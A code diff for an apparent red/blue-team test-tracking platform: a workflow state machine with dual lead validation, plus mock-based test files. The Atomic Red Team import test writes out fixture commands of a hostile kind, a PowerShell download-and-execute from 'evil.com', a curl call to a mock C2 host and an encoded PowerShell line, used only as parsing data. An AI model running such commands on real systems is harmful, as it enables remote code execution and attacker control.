TestState.blue_evaluating: [TestState.in_review],
TestState.in_review: [TestState.validated, TestState.rejected],
TestState.rejected: [TestState.draft],
TestState.validated: [], # terminal state
}
# ---------------------------------------------------------------------------
# Core helpers
# ---------------------------------------------------------------------------
def can_transition(test: Test, target_state: TestState) -> bool:
"""Return *True* if moving *test* to *target_state* is allowed."""
current = test.state if isinstance(test.state, TestState) else TestState(test.state)
return target_state in VALID_TRANSITIONS.get(current, [])
def transition_state(
db: Session,
test: Test,
target_state: TestState,
user: User,
*,
action_name: str = "transition_state",
extra_details: dict | None = None,
) -> Test:
"""Validate and perform a state transition, log it, and commit.
Raises :class:`~fastapi.HTTPException` 400 when the transition is invalid.
"""
if not can_transition(test, target_state):
raise HTTPException(
status_code=status.HTTP_400_BAD_REQUEST,
detail=(
f"Invalid transition: cannot move from "
f"'{test.state.value if isinstance(test.state, TestState) else test.state}' "
f"to '{target_state.value}'"
),
)
previous_state = test.state.value if isinstance(test.state, TestState) else test.state
test.state = target_state
db.flush()
details: dict = {
"previous_state": previous_state,
"new_state": target_state.value,
"test_name": test.name,
"technique_id": str(test.technique_id),
}
if extra_details:
details.update(extra_details)
log_action(
db,
user_id=user.id,
action=action_name,
entity_type="test",
entity_id=test.id,
details=details,
)
return test
# ---------------------------------------------------------------------------
# Lifecycle convenience functions
# ---------------------------------------------------------------------------
def start_execution(db: Session, test: Test, user: User) -> Test:
"""Move from ``draft`` → ``red_executing``.
Typically called by a **red_tech** when they begin the attack.
"""
test = transition_state(
db, test, TestState.red_executing, user,
action_name="start_execution",
)
test.execution_date = datetime.utcnow()
db.commit()
return test
def submit_red_evidence(db: Session, test: Test, user: User) -> Test:
"""Move from ``red_executing`` → ``blue_evaluating``.
Called by **red_tech** once they have finished documenting the attack.
"""
test = transition_state(
db, test, TestState.blue_evaluating, user,
action_name="submit_red_evidence",
)
db.commit()
return test
def submit_blue_evidence(db: Session, test: Test, user: User) -> Test:
"""Move from ``blue_evaluating`` → ``in_review``.
Called by **blue_tech** once they have finished documenting detection.
"""
test = transition_state(
db, test, TestState.in_review, user,
action_name="submit_blue_evidence",
)
db.commit()
return test
def validate_as_red_lead(
db: Session,
test: Test,
user: User,
validation_status: str,
notes: str | None = None,
) -> Test:
"""Record Red Lead's validation decision.
*validation_status* must be ``"approved"`` or ``"rejected"``.
After recording the decision, :func:`check_dual_validation` is called
to potentially advance the test to ``validated`` or ``rejected``.
"""
if test.state not in (TestState.in_review,):
raise HTTPException(
status_code=status.HTTP_400_BAD_REQUEST,
detail=f"Cannot validate red side while test is in '{test.state.value if isinstance(test.state, TestState) else test.state}' state (must be in_review)",
)
if validation_status not in ("approved", "rejected"):
raise HTTPException(
status_code=status.HTTP_400_BAD_REQUEST,
detail="validation_status must be 'approved' or 'rejected'",
)
now = datetime.utcnow()
test.red_validation_status = validation_status
test.red_validated_by = user.id
test.red_validated_at = now
test.red_validation_notes = notes
log_action(
db,
user_id=user.id,
action="validate_as_red_lead",
entity_type="test",
entity_id=test.id,
details={
"validation_status": validation_status,
"notes": notes,
"technique_id": str(test.technique_id),
},
)
check_dual_validation(db, test)
return test
def validate_as_blue_lead(
db: Session,
test: Test,
user: User,
validation_status: str,
notes: str | None = None,
) -> Test:
"""Record Blue Lead's validation decision.
*validation_status* must be ``"approved"`` or ``"rejected"``.
After recording the decision, :func:`check_dual_validation` is called
to potentially advance the test to ``validated`` or ``rejected``.
"""
if test.state not in (TestState.in_review,):
raise HTTPException(
status_code=status.HTTP_400_BAD_REQUEST,
detail=f"Cannot validate blue side while test is in '{test.state.value if isinstance(test.state, TestState) else test.state}' state (must be in_review)",
)
if validation_status not in ("approved", "rejected"):
raise HTTPException(
status_code=status.HTTP_400_BAD_REQUEST,
detail="validation_status must be 'approved' or 'rejected'",
)
now = datetime.utcnow()
test.blue_validation_status = validation_status
test.blue_validated_by = user.id
test.blue_validated_at = now
test.blue_validation_notes = notes
log_action(
db,
user_id=user.id,
action="validate_as_blue_lead",
entity_type="test",
entity_id=test.id,
details={
"validation_status": validation_status,
"notes": notes,
"technique_id": str(test.technique_id),
},
)
check_dual_validation(db, test)
return test
def check_dual_validation(db: Session, test: Test) -> Test:
"""Evaluate both leads' decisions and advance the test if both have voted.
- Both **approved** → ``validated``
- Either **rejected** → ``rejected``
- Otherwise no state change (waiting for the other lead).
Commits only when the state actually changes.
"""
red_status = test.red_validation_status
blue_status = test.blue_validation_status
if red_status == "rejected" or blue_status == "rejected":
test.state = TestState.rejected
db.commit()
elif red_status == "approved" and blue_status == "approved":
test.state = TestState.validated
db.commit()
else:
# One side hasn't voted yet — stay in_review, just flush
db.commit()
return test
def reopen_test(db: Session, test: Test, user: User) -> Test:
"""Move a ``rejected`` test back to ``draft``, clearing validation fields.
This allows the teams to redo the test cycle.
"""
test = transition_state(
db, test, TestState.draft, user,
action_name="reopen_test",
)
# Clear dual-validation fields
test.red_validation_status = None
test.red_validated_by = None
test.red_validated_at = None
test.red_validation_notes = None
test.blue_validation_status = None
test.blue_validated_by = None
test.blue_validated_at = None
test.blue_validation_notes = None
db.commit()
return test

View File

@@ -9,6 +9,7 @@ bcrypt==4.0.1
boto3
apscheduler
requests
pyyaml
taxii2-client
python-multipart
pydantic-settings

View File

@@ -0,0 +1,344 @@
"""Validation tests for T-106: Test Workflow Service.
Uses mock objects to avoid needing a running database.
The database module is stubbed before any app imports.
"""
import sys
import os
import uuid
from unittest.mock import MagicMock, patch
from types import ModuleType
from datetime import datetime
# ---------------------------------------------------------------------------
# 0. Stub heavy dependencies BEFORE importing any app modules
# ---------------------------------------------------------------------------
# Ensure backend/ is on sys.path
backend_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), ".."))
if backend_dir not in sys.path:
sys.path.insert(0, backend_dir)
# Stub pydantic_settings so config doesn't fail
if "pydantic_settings" not in sys.modules:
pydantic_settings_mock = ModuleType("pydantic_settings")
class _BaseSettings:
def __init__(self, **kwargs):
pass
def __init_subclass__(cls, **kwargs):
super().__init_subclass__(**kwargs)
pydantic_settings_mock.BaseSettings = _BaseSettings
sys.modules["pydantic_settings"] = pydantic_settings_mock
# Stub app.config
config_mod = ModuleType("app.config")
class _FakeSettings:
DATABASE_URL = "sqlite:///:memory:"
SECRET_KEY = "test"
ALGORITHM = "HS256"
ACCESS_TOKEN_EXPIRE_MINUTES = 60
MINIO_ENDPOINT = "localhost:9000"
MINIO_ACCESS_KEY = "test"
MINIO_SECRET_KEY = "test"
MINIO_BUCKET = "test"
config_mod.settings = _FakeSettings()
sys.modules["app.config"] = config_mod
# Stub app.database so no real engine is created
db_mod = ModuleType("app.database")
db_mod.Base = type("Base", (), {"metadata": MagicMock()})
db_mod.get_db = MagicMock()
sys.modules["app.database"] = db_mod
# Stub taxii2client
taxii_v20 = ModuleType("taxii2client.v20")
taxii_v20.Server = MagicMock
sys.modules["taxii2client"] = ModuleType("taxii2client")
sys.modules["taxii2client.v20"] = taxii_v20
# Stub jose
jose_mod = ModuleType("jose")
jose_mod.JWTError = Exception
jose_mod.jwt = MagicMock()
sys.modules["jose"] = jose_mod
# Stub boto3
boto3_mod = ModuleType("boto3")
boto3_mod.client = MagicMock()
sys.modules["boto3"] = boto3_mod
sys.modules["botocore"] = ModuleType("botocore")
sys.modules["botocore.exceptions"] = ModuleType("botocore.exceptions")
sys.modules["botocore.exceptions"].ClientError = Exception
# Stub apscheduler
sys.modules["apscheduler"] = ModuleType("apscheduler")
sys.modules["apscheduler.schedulers"] = ModuleType("apscheduler.schedulers")
sys.modules["apscheduler.schedulers.background"] = ModuleType("apscheduler.schedulers.background")
sys.modules["apscheduler.schedulers.background"].BackgroundScheduler = MagicMock
sys.modules["apscheduler.triggers"] = ModuleType("apscheduler.triggers")
sys.modules["apscheduler.triggers.cron"] = ModuleType("apscheduler.triggers.cron")
sys.modules["apscheduler.triggers.cron"].CronTrigger = MagicMock
# ---------------------------------------------------------------------------
# Now we can safely import
# ---------------------------------------------------------------------------
from app.models.enums import TestState
from app.services.test_workflow_service import (
VALID_TRANSITIONS,
can_transition,
transition_state,
start_execution,
submit_red_evidence,
submit_blue_evidence,
validate_as_red_lead,
validate_as_blue_lead,
check_dual_validation,
reopen_test,
)
# We also need HTTPException for assertions
from fastapi import HTTPException
# ---------------------------------------------------------------------------
# Helpers
# ---------------------------------------------------------------------------
def _make_test(state: TestState = TestState.draft, **kwargs) -> MagicMock:
t = MagicMock()
t.id = uuid.uuid4()
t.name = "Mock Test"
t.technique_id = uuid.uuid4()
t.state = state
t.red_validation_status = kwargs.get("red_validation_status", None)
t.blue_validation_status = kwargs.get("blue_validation_status", None)
t.red_validated_by = None
t.red_validated_at = None
t.red_validation_notes = None
t.blue_validated_by = None
t.blue_validated_at = None
t.blue_validation_notes = None
t.execution_date = None
return t
def _make_user(role: str = "red_tech") -> MagicMock:
user = MagicMock()
user.id = uuid.uuid4()
user.role = role
return user
def _make_db() -> MagicMock:
return MagicMock()
# ---------------------------------------------------------------------------
# 1. draft -> red_executing works
# ---------------------------------------------------------------------------
@patch("app.services.test_workflow_service.log_action")
def test_draft_to_red_executing(mock_log):
test = _make_test(TestState.draft)
user = _make_user("red_tech")
db = _make_db()
result = start_execution(db, test, user)
assert result.state == TestState.red_executing
assert result.execution_date is not None
db.commit.assert_called()
mock_log.assert_called()
print(" [PASS] Transition draft -> red_executing works")
# ---------------------------------------------------------------------------
# 2. draft -> validated fails (not allowed)
# ---------------------------------------------------------------------------
@patch("app.services.test_workflow_service.log_action")
def test_draft_to_validated_fails(mock_log):
test = _make_test(TestState.draft)
user = _make_user("admin")
db = _make_db()
try:
transition_state(db, test, TestState.validated, user)
assert False, "Should have raised HTTPException"
except HTTPException as exc:
assert exc.status_code == 400
print(" [PASS] Transition draft -> validated correctly fails")
# ---------------------------------------------------------------------------
# 3. red_executing -> blue_evaluating works
# ---------------------------------------------------------------------------
@patch("app.services.test_workflow_service.log_action")
def test_red_executing_to_blue_evaluating(mock_log):
test = _make_test(TestState.red_executing)
user = _make_user("red_tech")
db = _make_db()
result = submit_red_evidence(db, test, user)
assert result.state == TestState.blue_evaluating
db.commit.assert_called()
mock_log.assert_called()
print(" [PASS] Transition red_executing -> blue_evaluating works")
# ---------------------------------------------------------------------------
# 4. check_dual_validation -> validated when both approved
# ---------------------------------------------------------------------------
@patch("app.services.test_workflow_service.log_action")
def test_dual_validation_both_approved(mock_log):
test = _make_test(TestState.in_review)
user_red = _make_user("red_lead")
user_blue = _make_user("blue_lead")
db = _make_db()
validate_as_red_lead(db, test, user_red, "approved", "LGTM")
validate_as_blue_lead(db, test, user_blue, "approved", "Detection OK")
assert test.state == TestState.validated
print(" [PASS] check_dual_validation -> validated when both approved")
# ---------------------------------------------------------------------------
# 5. check_dual_validation -> rejected when one rejects
# ---------------------------------------------------------------------------
@patch("app.services.test_workflow_service.log_action")
def test_dual_validation_one_rejected(mock_log):
test = _make_test(TestState.in_review)
user_red = _make_user("red_lead")
db = _make_db()
validate_as_red_lead(db, test, user_red, "rejected", "Insufficient evidence")
assert test.state == TestState.rejected
print(" [PASS] check_dual_validation -> rejected when one rejects")
# ---------------------------------------------------------------------------
# 6. reopen_test clears validation fields
# ---------------------------------------------------------------------------
@patch("app.services.test_workflow_service.log_action")
def test_reopen_clears_validation(mock_log):
test = _make_test(
TestState.rejected,
red_validation_status="rejected",
blue_validation_status="approved",
)
user = _make_user("red_lead")
db = _make_db()
result = reopen_test(db, test, user)
assert result.state == TestState.draft
assert result.red_validation_status is None
assert result.blue_validation_status is None
assert result.red_validated_by is None
assert result.red_validated_at is None
assert result.red_validation_notes is None
assert result.blue_validated_by is None
assert result.blue_validated_at is None
assert result.blue_validation_notes is None
db.commit.assert_called()
print(" [PASS] reopen_test clears validation fields and moves to draft")
# ---------------------------------------------------------------------------
# 7. Every transition generates an audit log
# ---------------------------------------------------------------------------
@patch("app.services.test_workflow_service.log_action")
def test_transitions_generate_audit_logs(mock_log):
test = _make_test(TestState.draft)
user = _make_user("red_tech")
db = _make_db()
start_execution(db, test, user)
assert mock_log.call_count >= 1
c1 = mock_log.call_count
submit_red_evidence(db, test, user)
assert mock_log.call_count > c1
c2 = mock_log.call_count
submit_blue_evidence(db, test, user)
assert mock_log.call_count > c2
print(" [PASS] Each transition generates an audit log")
# ---------------------------------------------------------------------------
# 8. can_transition correctness
# ---------------------------------------------------------------------------
def test_can_transition_map():
test = _make_test(TestState.draft)
assert can_transition(test, TestState.red_executing) is True
assert can_transition(test, TestState.validated) is False
assert can_transition(test, TestState.blue_evaluating) is False
test.state = TestState.red_executing
assert can_transition(test, TestState.blue_evaluating) is True
assert can_transition(test, TestState.draft) is False
test.state = TestState.blue_evaluating
assert can_transition(test, TestState.in_review) is True
test.state = TestState.in_review
assert can_transition(test, TestState.validated) is True
assert can_transition(test, TestState.rejected) is True
assert can_transition(test, TestState.draft) is False
test.state = TestState.rejected
assert can_transition(test, TestState.draft) is True
test.state = TestState.validated
assert can_transition(test, TestState.draft) is False
assert can_transition(test, TestState.rejected) is False
print(" [PASS] can_transition map is correct")
# ---------------------------------------------------------------------------
# Run all
# ---------------------------------------------------------------------------
if __name__ == "__main__":
print("T-106 Validation: Test Workflow Service")
print("=" * 50)
test_draft_to_red_executing()
test_draft_to_validated_fails()
test_red_executing_to_blue_evaluating()
test_dual_validation_both_approved()
test_dual_validation_one_rejected()
test_reopen_clears_validation()
test_transitions_generate_audit_logs()
test_can_transition_map()
print("=" * 50)
print("ALL T-106 validations PASSED!")

View File

@@ -0,0 +1,229 @@
"""Validation tests for T-107: Updated status recalculation service.
Verifies the new logic that considers dual validation and detection_result.
"""
import sys
import os
import uuid
from unittest.mock import MagicMock
from types import ModuleType
# ---------------------------------------------------------------------------
# Stub heavy dependencies
# ---------------------------------------------------------------------------
backend_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), ".."))
if backend_dir not in sys.path:
sys.path.insert(0, backend_dir)
# Only stub if not already stubbed (in case tests run together)
if "pydantic_settings" not in sys.modules:
pydantic_settings_mock = ModuleType("pydantic_settings")
class _BaseSettings:
def __init__(self, **kwargs):
pass
def __init_subclass__(cls, **kwargs):
super().__init_subclass__(**kwargs)
pydantic_settings_mock.BaseSettings = _BaseSettings
sys.modules["pydantic_settings"] = pydantic_settings_mock
if "app.config" not in sys.modules:
config_mod = ModuleType("app.config")
class _FakeSettings:
DATABASE_URL = "sqlite:///:memory:"
SECRET_KEY = "test"
ALGORITHM = "HS256"
ACCESS_TOKEN_EXPIRE_MINUTES = 60
MINIO_ENDPOINT = "localhost:9000"
MINIO_ACCESS_KEY = "test"
MINIO_SECRET_KEY = "test"
MINIO_BUCKET = "test"
config_mod.settings = _FakeSettings()
sys.modules["app.config"] = config_mod
if "app.database" not in sys.modules:
db_mod = ModuleType("app.database")
db_mod.Base = type("Base", (), {"metadata": MagicMock()})
db_mod.get_db = MagicMock()
sys.modules["app.database"] = db_mod
if "taxii2client" not in sys.modules:
sys.modules["taxii2client"] = ModuleType("taxii2client")
taxii_v20 = ModuleType("taxii2client.v20")
taxii_v20.Server = MagicMock
sys.modules["taxii2client.v20"] = taxii_v20
if "jose" not in sys.modules:
jose_mod = ModuleType("jose")
jose_mod.JWTError = Exception
jose_mod.jwt = MagicMock()
sys.modules["jose"] = jose_mod
if "boto3" not in sys.modules:
boto3_mod = ModuleType("boto3")
boto3_mod.client = MagicMock()
sys.modules["boto3"] = boto3_mod
sys.modules["botocore"] = ModuleType("botocore")
sys.modules["botocore.exceptions"] = ModuleType("botocore.exceptions")
sys.modules["botocore.exceptions"].ClientError = Exception
if "apscheduler" not in sys.modules:
sys.modules["apscheduler"] = ModuleType("apscheduler")
sys.modules["apscheduler.schedulers"] = ModuleType("apscheduler.schedulers")
sys.modules["apscheduler.schedulers.background"] = ModuleType("apscheduler.schedulers.background")
sys.modules["apscheduler.schedulers.background"].BackgroundScheduler = MagicMock
sys.modules["apscheduler.triggers"] = ModuleType("apscheduler.triggers")
sys.modules["apscheduler.triggers.cron"] = ModuleType("apscheduler.triggers.cron")
sys.modules["apscheduler.triggers.cron"].CronTrigger = MagicMock
# ---------------------------------------------------------------------------
# Imports
# ---------------------------------------------------------------------------
from app.models.enums import TechniqueStatus, TestState, TestResult
from app.services.status_service import recalculate_technique_status
# ---------------------------------------------------------------------------
# Helpers
# ---------------------------------------------------------------------------
def _make_test_obj(state, detection_result=None):
"""Create a mock test with the given state and detection_result."""
t = MagicMock()
t.state = state
t.detection_result = detection_result
return t
def _make_technique(tests=None):
"""Create a mock technique."""
technique = MagicMock()
technique.tests = tests or []
technique.status_global = None
return technique
def _make_db():
return MagicMock()
# ---------------------------------------------------------------------------
# 1. Sin tests -> not_evaluated
# ---------------------------------------------------------------------------
def test_no_tests():
technique = _make_technique([])
db = _make_db()
recalculate_technique_status(db, technique)
assert technique.status_global == TechniqueStatus.not_evaluated
db.commit.assert_called()
print(" [PASS] No tests -> not_evaluated")
# ---------------------------------------------------------------------------
# 2. Todos validated con detection=detected -> validated
# ---------------------------------------------------------------------------
def test_all_validated_all_detected():
tests = [
_make_test_obj(TestState.validated, TestResult.detected),
_make_test_obj(TestState.validated, TestResult.detected),
]
technique = _make_technique(tests)
db = _make_db()
recalculate_technique_status(db, technique)
assert technique.status_global == TechniqueStatus.validated
print(" [PASS] All validated, all detected -> validated")
# ---------------------------------------------------------------------------
# 3. Algunos validated, otros en progreso -> partial
# ---------------------------------------------------------------------------
def test_some_validated_some_in_progress():
tests = [
_make_test_obj(TestState.validated, TestResult.detected),
_make_test_obj(TestState.red_executing, None),
]
technique = _make_technique(tests)
db = _make_db()
recalculate_technique_status(db, technique)
assert technique.status_global == TechniqueStatus.partial
print(" [PASS] Some validated, some in progress -> partial")
# ---------------------------------------------------------------------------
# 4. Todos en estados intermedios -> in_progress
# ---------------------------------------------------------------------------
def test_all_intermediate():
tests = [
_make_test_obj(TestState.red_executing, None),
_make_test_obj(TestState.blue_evaluating, None),
]
technique = _make_technique(tests)
db = _make_db()
recalculate_technique_status(db, technique)
assert technique.status_global == TechniqueStatus.in_progress
print(" [PASS] All intermediate -> in_progress")
# ---------------------------------------------------------------------------
# 5. Todos validated con detection=not_detected -> not_covered
# ---------------------------------------------------------------------------
def test_all_validated_not_detected():
tests = [
_make_test_obj(TestState.validated, TestResult.not_detected),
_make_test_obj(TestState.validated, TestResult.not_detected),
]
technique = _make_technique(tests)
db = _make_db()
recalculate_technique_status(db, technique)
assert technique.status_global == TechniqueStatus.not_covered
print(" [PASS] All validated, not_detected -> not_covered")
# ---------------------------------------------------------------------------
# Bonus: All validated with partially_detected -> partial
# ---------------------------------------------------------------------------
def test_all_validated_partially_detected():
tests = [
_make_test_obj(TestState.validated, TestResult.detected),
_make_test_obj(TestState.validated, TestResult.partially_detected),
]
technique = _make_technique(tests)
db = _make_db()
recalculate_technique_status(db, technique)
assert technique.status_global == TechniqueStatus.partial
print(" [PASS] All validated, partially_detected -> partial")
# ---------------------------------------------------------------------------
# Run all
# ---------------------------------------------------------------------------
if __name__ == "__main__":
print("T-107 Validation: Status Service Recalculation")
print("=" * 50)
test_no_tests()
test_all_validated_all_detected()
test_some_validated_some_in_progress()
test_all_intermediate()
test_all_validated_not_detected()
test_all_validated_partially_detected()
print("=" * 50)
print("ALL T-107 validations PASSED!")

View File

@@ -0,0 +1,355 @@
"""Validation tests for T-108: Atomic Red Team Import Service.
Tests the YAML parsing logic and deduplication using synthetic data.
The download test is marked as optional (requires network).
"""
import sys
import os
import uuid
import tempfile
import shutil
from unittest.mock import MagicMock, patch, PropertyMock
from types import ModuleType
from pathlib import Path
# ---------------------------------------------------------------------------
# Stub heavy dependencies
# ---------------------------------------------------------------------------
backend_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), ".."))
if backend_dir not in sys.path:
sys.path.insert(0, backend_dir)
if "pydantic_settings" not in sys.modules:
pydantic_settings_mock = ModuleType("pydantic_settings")
class _BaseSettings:
def __init__(self, **kwargs): pass
def __init_subclass__(cls, **kwargs): super().__init_subclass__(**kwargs)
pydantic_settings_mock.BaseSettings = _BaseSettings
sys.modules["pydantic_settings"] = pydantic_settings_mock
if "app.config" not in sys.modules:
config_mod = ModuleType("app.config")
class _FakeSettings:
DATABASE_URL = "sqlite:///:memory:"
SECRET_KEY = "test"
ALGORITHM = "HS256"
ACCESS_TOKEN_EXPIRE_MINUTES = 60
MINIO_ENDPOINT = "localhost:9000"
MINIO_ACCESS_KEY = "test"
MINIO_SECRET_KEY = "test"
MINIO_BUCKET = "test"
config_mod.settings = _FakeSettings()
sys.modules["app.config"] = config_mod
if "app.database" not in sys.modules:
db_mod = ModuleType("app.database")
db_mod.Base = type("Base", (), {"metadata": MagicMock()})
db_mod.get_db = MagicMock()
sys.modules["app.database"] = db_mod
if "taxii2client" not in sys.modules:
sys.modules["taxii2client"] = ModuleType("taxii2client")
taxii_v20 = ModuleType("taxii2client.v20")
taxii_v20.Server = MagicMock
sys.modules["taxii2client.v20"] = taxii_v20
if "jose" not in sys.modules:
jose_mod = ModuleType("jose")
jose_mod.JWTError = Exception
jose_mod.jwt = MagicMock()
sys.modules["jose"] = jose_mod
if "boto3" not in sys.modules:
boto3_mod = ModuleType("boto3")
boto3_mod.client = MagicMock()
sys.modules["boto3"] = boto3_mod
sys.modules["botocore"] = ModuleType("botocore")
sys.modules["botocore.exceptions"] = ModuleType("botocore.exceptions")
sys.modules["botocore.exceptions"].ClientError = Exception
if "apscheduler" not in sys.modules:
sys.modules["apscheduler"] = ModuleType("apscheduler")
sys.modules["apscheduler.schedulers"] = ModuleType("apscheduler.schedulers")
sys.modules["apscheduler.schedulers.background"] = ModuleType("apscheduler.schedulers.background")
sys.modules["apscheduler.schedulers.background"].BackgroundScheduler = MagicMock
sys.modules["apscheduler.triggers"] = ModuleType("apscheduler.triggers")
sys.modules["apscheduler.triggers.cron"] = ModuleType("apscheduler.triggers.cron")
sys.modules["apscheduler.triggers.cron"].CronTrigger = MagicMock
# ---------------------------------------------------------------------------
# Imports
# ---------------------------------------------------------------------------
import yaml
from app.services.atomic_import_service import (
_parse_yaml_files,
_extract_zip,
import_atomic_red_team,
ATOMIC_RT_ZIP_URL,
)
# ---------------------------------------------------------------------------
# Helpers — create a synthetic atomics directory
# ---------------------------------------------------------------------------
def _create_fake_atomics(tmp_dir: str, techniques: dict[str, list[dict]]) -> Path:
"""Create a fake atomics/ directory with YAML files.
Parameters
----------
techniques : dict
Mapping from technique ID (e.g. "T1059.001") to a list of test dicts.
"""
atomics = Path(tmp_dir) / "atomics"
atomics.mkdir(parents=True, exist_ok=True)
for tech_id, tests in techniques.items():
tech_dir = atomics / tech_id
tech_dir.mkdir(exist_ok=True)
yaml_data = {
"attack_technique": tech_id,
"display_name": f"Technique {tech_id}",
"atomic_tests": tests,
}
yaml_path = tech_dir / f"{tech_id}.yaml"
with open(yaml_path, "w", encoding="utf-8") as fh:
yaml.dump(yaml_data, fh)
return atomics
# ---------------------------------------------------------------------------
# 1. Parsing creates correct TestTemplate-like dicts
# ---------------------------------------------------------------------------
def test_parse_creates_templates():
tmp_dir = tempfile.mkdtemp(prefix="aegis_test_")
try:
atomics = _create_fake_atomics(tmp_dir, {
"T1059.001": [
{
"name": "PowerShell Invoke-Expression",
"description": "Runs a PS command",
"supported_platforms": ["windows"],
"executor": {
"name": "powershell",
"command": "IEX (New-Object Net.WebClient).DownloadString('http://evil.com')",
},
},
{
"name": "PowerShell Base64 Encoded",
"description": "Runs base64-encoded PS",
"supported_platforms": ["windows"],
"executor": {
"name": "powershell",
"command": "powershell -enc ZQBjaA==",
},
},
],
"T1053.005": [
{
"name": "Scheduled Task Creation",
"description": "Creates a scheduled task",
"supported_platforms": ["windows", "linux"],
"executor": {
"name": "command_prompt",
"command": "schtasks /create /tn test /tr calc.exe",
},
},
],
})
results = _parse_yaml_files(atomics)
assert len(results) == 3, f"Expected 3 tests, got {len(results)}"
# Verify atomic_test_id format
ids = {r["atomic_test_id"] for r in results}
assert "T1059.001-0" in ids
assert "T1059.001-1" in ids
assert "T1053.005-0" in ids
# Check source is "atomic_red_team" (via source_url)
for r in results:
assert "atomic-red-team" in r["source_url"]
# Check platforms
for r in results:
if r["technique_id"] == "T1053.005":
assert "windows" in r["platforms"]
assert "linux" in r["platforms"]
print(" [PASS] Parsing creates correct templates with source and valid data")
finally:
shutil.rmtree(tmp_dir, ignore_errors=True)
# ---------------------------------------------------------------------------
# 2. Running twice does not duplicate
# ---------------------------------------------------------------------------
@patch("app.services.atomic_import_service.TestTemplate")
@patch("app.services.atomic_import_service.log_action")
@patch("app.services.atomic_import_service._download_zip")
def test_no_duplicates(mock_download, mock_log, MockTestTemplate):
"""Import twice with same data — second run should skip everything."""
import io
import zipfile
# Make TestTemplate() return a mock each time
MockTestTemplate.side_effect = lambda **kwargs: MagicMock(**kwargs)
# Keep atomic_test_id queryable
MockTestTemplate.atomic_test_id = MagicMock()
MockTestTemplate.atomic_test_id.isnot = MagicMock(return_value=True)
# Build a fake ZIP
tmp_dir = tempfile.mkdtemp(prefix="aegis_test_zip_")
try:
atomics = _create_fake_atomics(
os.path.join(tmp_dir, "atomic-red-team-master"),
{
"T1059.001": [
{
"name": "Test One",
"description": "Desc",
"supported_platforms": ["windows"],
"executor": {"name": "sh", "command": "echo test"},
},
],
},
)
# Create a ZIP from the tmp_dir
zip_buffer = io.BytesIO()
with zipfile.ZipFile(zip_buffer, "w") as zf:
root = Path(tmp_dir)
for file_path in root.rglob("*"):
if file_path.is_file():
arcname = str(file_path.relative_to(root))
zf.write(file_path, arcname)
zip_bytes = zip_buffer.getvalue()
mock_download.return_value = zip_bytes
# --- First import ---
# Mock DB: no existing templates
db = MagicMock()
mock_query = MagicMock()
mock_query.filter.return_value.all.return_value = []
db.query.return_value = mock_query
added_templates = []
def track_add(template):
added_templates.append(template)
db.add.side_effect = track_add
result1 = import_atomic_red_team(db)
assert result1["created"] == 1
assert result1["skipped_existing"] == 0
# --- Second import ---
# Now DB returns the existing template
db2 = MagicMock()
mock_query2 = MagicMock()
# Return the atomic_test_id that was already created
mock_query2.filter.return_value.all.return_value = [("T1059.001-0",)]
db2.query.return_value = mock_query2
added2 = []
db2.add.side_effect = lambda t: added2.append(t)
result2 = import_atomic_red_team(db2)
assert result2["created"] == 0
assert result2["skipped_existing"] == 1
assert len(added2) == 0
print(" [PASS] Running twice does not duplicate templates")
finally:
shutil.rmtree(tmp_dir, ignore_errors=True)
# ---------------------------------------------------------------------------
# 3. Templates mapped correctly to MITRE techniques
# ---------------------------------------------------------------------------
def test_templates_mapped_to_techniques():
tmp_dir = tempfile.mkdtemp(prefix="aegis_test_")
try:
atomics = _create_fake_atomics(tmp_dir, {
"T1059.001": [
{
"name": "Test",
"description": "Desc",
"supported_platforms": ["windows"],
"executor": {"name": "sh", "command": "echo hi"},
},
],
"T1071.001": [
{
"name": "HTTP C2",
"description": "HTTP-based C2",
"supported_platforms": ["linux"],
"executor": {"name": "bash", "command": "curl http://c2.evil"},
},
],
})
results = _parse_yaml_files(atomics)
technique_ids = {r["technique_id"] for r in results}
assert "T1059.001" in technique_ids
assert "T1071.001" in technique_ids
for r in results:
assert r["technique_id"].startswith("T")
print(" [PASS] Templates mapped correctly to MITRE techniques")
finally:
shutil.rmtree(tmp_dir, ignore_errors=True)
# ---------------------------------------------------------------------------
# 4. Service module structure is correct
# ---------------------------------------------------------------------------
def test_service_module_structure():
"""Verify the service has all expected public functions."""
from app.services import atomic_import_service as svc
assert hasattr(svc, "import_atomic_red_team")
assert callable(svc.import_atomic_red_team)
assert hasattr(svc, "ATOMIC_RT_ZIP_URL")
assert "github.com" in svc.ATOMIC_RT_ZIP_URL
print(" [PASS] Service module has correct structure")
# ---------------------------------------------------------------------------
# 5. ZIP URL is correct (no rate-limit concern with ZIP download)
# ---------------------------------------------------------------------------
def test_zip_url_no_rate_limit():
"""The URL should be a direct ZIP download, not an API endpoint."""
assert "/archive/" in ATOMIC_RT_ZIP_URL
assert "api.github.com" not in ATOMIC_RT_ZIP_URL
print(" [PASS] ZIP download URL avoids API rate limits")
# ---------------------------------------------------------------------------
# Run all
# ---------------------------------------------------------------------------
if __name__ == "__main__":
print("T-108 Validation: Atomic Red Team Import Service")
print("=" * 55)
test_parse_creates_templates()
test_no_duplicates()
test_templates_mapped_to_techniques()
test_service_module_structure()
test_zip_url_no_rate_limit()
print("=" * 55)
print("ALL T-108 validations PASSED!")